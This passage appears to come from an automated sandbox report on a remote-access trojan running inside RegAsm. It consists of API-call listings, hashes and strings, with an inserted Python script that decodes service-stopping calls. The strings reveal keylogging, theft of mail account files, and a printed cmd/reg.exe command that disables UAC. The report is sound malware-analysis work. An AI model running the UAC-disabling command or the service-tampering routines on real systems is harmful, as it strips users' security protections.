                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
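The ADVAPI32 entries in this part of the listing (OpenSCManagerW, OpenServiceW, ChangeServiceConfigW with start type 00000004, and ControlService with control codes 00000001, 00000002 and 00000003) are the RAT's service-tampering routines: each opens a service with exactly one right and then disables, stops, pauses or resumes it. As an added example that is not part of the Joe Sandbox report and not Remcos code, the Python below parses API lines in the report's own `Name.Module(args), ref: addr` format, decodes the OpenServiceW access mask, the ControlService control code and the ChangeServiceConfigW start type against the documented winsvc.h constants, and checks that every action was issued on a handle holding the right it needs (otherwise the call would fail with ERROR_ACCESS_DENIED and the code path is dead). The sample trace is constructed by copying the ADVAPI32 lines of the entries above; the function names `parse_call` and `classify_service_calls`, and the treatment of trailing argument slots as caller stack context rather than parameters, are my own assumptions.

```python
"""Decode the service-tampering API sequence from Joe Sandbox API lines.

Added example; not part of the report or of the analysed sample. Constants
are the documented winsvc.h values. SAMPLE_TRACE is constructed from the
report's ADVAPI32 lines, in the report's own format.
"""
import re

# Access rights on a service handle (winsvc.h).
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
CONTROL_CODES = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                 3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
               2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
               4: "SERVICE_DISABLED"}
# Right the handle must hold for the action to succeed (else ERROR_ACCESS_DENIED).
REQUIRED_RIGHT = {"SERVICE_CONTROL_STOP": 0x0020, "SERVICE_CONTROL_PAUSE": 0x0040,
                  "SERVICE_CONTROL_CONTINUE": 0x0040, "ChangeServiceConfigW": 0x0002}

# "Name.Module(arg,arg,...), ref: addr", with or without the report's bullet.
LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# Constructed input: ADVAPI32 lines copied from the report entries above.
SAMPLE_TRACE = """\
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
"""


def parse_call(line):
    """Parse one report API line; hex slots become ints, '?' becomes None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    name, module, args, ref = m.groups()
    vals = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None
            for a in args.split(",") if a]
    return {"name": name, "module": module, "args": vals, "ref": ref}


def decode_mask(mask, table):
    """Expand a bit mask into the named flags it contains."""
    return [n for bit, n in table.items() if mask & bit] or [f"0x{mask:X}"]


def _action(ref, api, detail, access, needed):
    return {
        "ref": ref, "action": api, "detail": detail,
        "access": decode_mask(access or 0, SERVICE_ACCESS),
        # Mismatch means OpenServiceW did not grant what the action needs.
        "access_ok": bool(access) and bool(access & needed),
    }


def classify_service_calls(trace_text):
    """Label each service-control action in report order.

    Only the leading argument slots are parameters; the report dumps raw
    stack words, so later slots (return addresses, '?') are caller context.
    """
    actions, access = [], None
    for raw in trace_text.splitlines():
        call = parse_call(raw)
        if not call or call["module"] != "ADVAPI32":
            continue
        a = call["args"]
        if call["name"] == "OpenServiceW" and len(a) > 2 and a[2] is not None:
            access = a[2]  # dwDesiredAccess requested on the service handle
        elif call["name"] == "ControlService" and len(a) > 1 and a[1] in CONTROL_CODES:
            ctrl = CONTROL_CODES[a[1]]  # dwControl
            actions.append(_action(call["ref"], ctrl, ctrl, access, REQUIRED_RIGHT[ctrl]))
        elif call["name"] == "ChangeServiceConfigW" and len(a) > 2 and a[2] is not None:
            start = START_TYPES.get(a[2], f"0x{a[2]:X}")  # dwStartType
            actions.append(_action(call["ref"], "ChangeServiceConfigW",
                                   f"dwStartType={start}", access,
                                   REQUIRED_RIGHT["ChangeServiceConfigW"]))
    return actions


if __name__ == "__main__":
    for act in classify_service_calls(SAMPLE_TRACE):
        flag = "" if act["access_ok"] else "  <-- handle lacks the needed right"
        print(f"{act['ref']}: {act['action']} {act['detail']} "
              f"via {'|'.join(act['access'])}{flag}")
```

Run against the report's lines this yields one disable (start type SERVICE_DISABLED on a SERVICE_CHANGE_CONFIG handle) followed by stop, pause and continue, each on a handle opened with exactly the matching right, which is why all four paths are live rather than dead code. The same decoder can be pointed at any other OpenServiceW/ControlService pair in the report to see which right a sample asked for before acting.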
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                Similarity
                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                Similarity
                                                                                • API ID: EventLocalTimewsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                • String ID: XQG
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                Strings
                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateProcess
                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                • String ID: KeepAlive | Disabled
                                                                                APIs
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                Similarity
                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                • String ID: Alarm triggered
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                Strings
                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                Similarity
                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                • API String ID: 3024135584-2418719853
                                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                APIs
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                • _free.LIBCMT ref: 0044943D
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00449609
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                • String ID:
                                                                                • API String ID: 1286116820-0
                                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                APIs
                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2180151492-0
                                                                                • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                • __freea.LIBCMT ref: 0045129D
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                • String ID:
                                                                                • API String ID: 313313983-0
                                                                                • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                • _free.LIBCMT ref: 0044F43F
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                • _free.LIBCMT ref: 100071B8
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                APIs
